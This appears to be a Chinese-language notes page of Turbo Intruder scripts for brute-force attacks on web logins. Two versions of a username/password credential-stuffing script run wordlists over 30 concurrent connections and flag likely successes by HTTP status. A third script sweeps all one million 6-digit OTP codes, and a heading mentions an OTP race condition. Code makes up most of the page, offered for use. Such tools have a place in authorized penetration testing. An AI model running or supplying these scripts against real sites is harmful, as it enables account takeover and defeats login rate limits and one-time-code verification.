爆破用户名密码脚本

from urllib import quote

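def password_brute(target, engine):
    """Queue one request per line of the password wordlist.

    Each line has trailing whitespace stripped and is URL-encoded with
    ``quote`` before being passed to ``engine.queue`` as the payload for
    ``target.req``.
    """
    # The with-block closes the wordlist once every line has been queued;
    # a bare open() in the for-header left the handle to the garbage collector.
    with open('/Users/mac/safe/web/brute/mypass.txt') as wordlist:
        for line in wordlist:
            engine.queue(target.req, quote(line.rstrip()))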

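def user_brute(target, engine):
    """Queue one request per line of the username wordlist.

    Each line has trailing whitespace stripped and is URL-encoded with
    ``quote`` before being passed to ``engine.queue`` as the payload for
    ``target.req``.
    """
    # Close the wordlist deterministically instead of relying on the
    # garbage collector to release the handle.
    with open('/Users/mac/safe/web/brute/myuser.txt') as wordlist:
        for line in wordlist:
            engine.queue(target.req, quote(line.rstrip()))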
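def user_password_brute(target, engine):
    """Queue a request for every (user, password) pair from the two lists.

    The password file drives the outer loop and the user file the inner one,
    so each password is paired with every user before the next password is
    read. Both values are stripped and URL-encoded, then queued as a
    two-element payload list in the order ``[user, password]``.

    Seen from the server, this produces one attempt per account in rotation
    rather than a burst of attempts against a single account.
    """
    with open(r"C:\Users\tea90\Downloads\f.txt") as passwords:
        for password in passwords:
            # Loop-invariant for the inner loop, so encode it once.
            encoded_password = quote(password.rstrip())
            # The user list is reopened for each password to restart it from
            # the top; the with-block closes each handle instead of leaking
            # one per outer iteration.
            with open(r"C:\Users\tea90\Downloads\phone.txt") as users:
                for user in users:
                    engine.queue(target.req, [quote(user.rstrip()), encoded_password])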

def queueRequests(target, wordlists):
    """Create the request engine and start the combined user/password run.

    ``wordlists`` is accepted but not used; the wordlist paths are hard-coded
    in the helper functions. ``RequestEngine`` is not defined in this script
    and is presumably supplied by the host tool (the names match the
    Turbo Intruder script API).
    """
    connection_count = 30
    requests_per_connection = 100
    engine = RequestEngine(
        endpoint=target.endpoint,
        concurrentConnections=connection_count,
        requestsPerConnection=requests_per_connection,
        pipeline=False,
    )
    # Single-list alternatives, left disabled:
    #   user_brute(target, engine)
    #   password_brute(target, engine)
    user_password_brute(target, engine)

def handleResponse(req, interesting):
    """Add the response to the results table when its status is 302.

    ``interesting`` is not consulted. Treating 302 as the success signal
    presumably assumes the application redirects after a valid login;
    confirm this against the application under test.
    """
    # Attributes currently available on req: req.status, req.wordcount,
    # req.length and req.response.
    is_redirect = req.status == 302
    if not is_redirect:
        return
    table.add(req)

去除编码

上面的脚本使用 urllib.quote 函数来处理从文件中读取的每一行数据。这个函数用于 URL 编码,会对某些特殊字符(如空格、@ 符号等)进行转义。如果文件中的 @ 等符号被转义后不符合预期,而你的目的是在密码或用户名中直接使用这些符号,那么可以不使用 quote 函数。下面的脚本只在 user_password_brute 中去掉了 quote,password_brute 和 user_brute 仍然保留编码。

from urllib import quote

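def password_brute(target, engine):
    """Queue one request per line of the wordlist, URL-encoding each value.

    Each line has trailing whitespace stripped and is passed through
    ``quote`` before being queued as the payload for ``target.req``.
    """
    # NOTE(review): this reads phone.txt although the function is named for
    # passwords; confirm which wordlist is intended.
    # The with-block closes the file once every line has been queued.
    with open(r"C:\Users\tea90\Downloads\phone.txt") as wordlist:
        for line in wordlist:
            engine.queue(target.req, quote(line.rstrip()))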

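def user_brute(target, engine):
    """Queue one request per line of the username wordlist.

    Each line has trailing whitespace stripped and is URL-encoded with
    ``quote`` before being passed to ``engine.queue`` as the payload for
    ``target.req``.
    """
    # Close the wordlist deterministically rather than leaving the handle
    # open until it is garbage-collected.
    with open('/Users/mac/safe/web/brute/myuser.txt') as wordlist:
        for line in wordlist:
            engine.queue(target.req, quote(line.rstrip()))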
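def user_password_brute(target, engine):
    """Queue a request for every (user, password) pair, without URL-encoding.

    The password file drives the outer loop and the user file the inner one.
    Values are only stripped of trailing whitespace, so characters such as
    ``@`` reach the request exactly as written in the wordlists. The payload
    is a two-element list in the order ``[user, password]``.
    """
    # NOTE(review): passwords come from phone.txt and users from f.txt here,
    # the reverse of the earlier listing on this page; confirm which file
    # holds which list.
    with open(r"C:\Users\tea90\Downloads\phone.txt") as passwords:
        for password in passwords:
            # Loop-invariant for the inner loop, so strip it once.
            plain_password = password.rstrip()
            # The user list is reopened per password to restart it from the
            # top; the with-block closes each handle instead of leaking it.
            with open(r"C:\Users\tea90\Downloads\f.txt") as users:
                for user in users:
                    engine.queue(target.req, [user.rstrip(), plain_password])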

def queueRequests(target, wordlists):
    """Create the request engine and start the combined user/password run.

    ``wordlists`` is accepted but not used; the wordlist paths are hard-coded
    in the helper functions. ``RequestEngine`` is not defined in this script
    and is presumably supplied by the host tool.
    """
    connection_count = 30
    requests_per_connection = 100
    engine = RequestEngine(
        endpoint=target.endpoint,
        concurrentConnections=connection_count,
        requestsPerConnection=requests_per_connection,
        pipeline=False,
    )
    # Single-list alternatives, left disabled:
    #   user_brute(target, engine)
    #   password_brute(target, engine)
    user_password_brute(target, engine)

def handleResponse(req, interesting):
    """Add every response whose status is not 404 to the results table.

    ``interesting`` is not consulted. The filter only drops 404s, so failed
    attempts that return any other status are recorded as well.
    """
    # Attributes currently available on req: req.status, req.wordcount,
    # req.length and req.response.
    not_found = req.status == 404
    if not_found:
        return
    table.add(req)

example

竞争条件之:给两个不同的手机号发送otp会发送同样的otp

爆破6位数验证码

from itertools import product

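def brute_veify_code(target, engine, length):
    """Queue every ``length``-digit numeric code as a payload for ``target.req``.

    Codes are built from the alphabet '1234567890' in that order, so a run
    covers all ``10 ** length`` values (one million for six digits).

    NOTE(review): an exhaustive sweep of this size can only complete when the
    verification endpoint does not cap or expire attempts per issued code;
    that limit is the control this test exercises.
    """
    pattern = '1234567890'
    # Consume the product lazily: wrapping it in list() built all
    # 10 ** length tuples in memory before the first request was queued.
    for digits in product(pattern, repeat=length):
        engine.queue(target.req, ''.join(digits))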


def queueRequests(target, wordlists):
    """Create a pipelined request engine and start the 6-digit code sweep.

    ``wordlists`` is accepted but not used. ``RequestEngine`` is not defined
    in this script and is presumably supplied by the host tool.
    """
    connection_count = 30
    requests_per_connection = 100
    code_length = 6
    engine = RequestEngine(
        endpoint=target.endpoint,
        concurrentConnections=connection_count,
        requestsPerConnection=requests_per_connection,
        pipeline=True,
    )
    brute_veify_code(target, engine, code_length)


def handleResponse(req, interesting):
    """Add the response to the results table unless its body contains 'error'.

    ``interesting`` is not consulted. The check is a plain substring match on
    ``req.response``, so it presumably relies on the application including
    the word 'error' in every rejected attempt; confirm against real
    responses.
    """
    # Attributes currently available on req: req.status, req.wordcount,
    # req.length and req.response.
    rejected = 'error' in req.response
    if rejected:
        return
    table.add(req)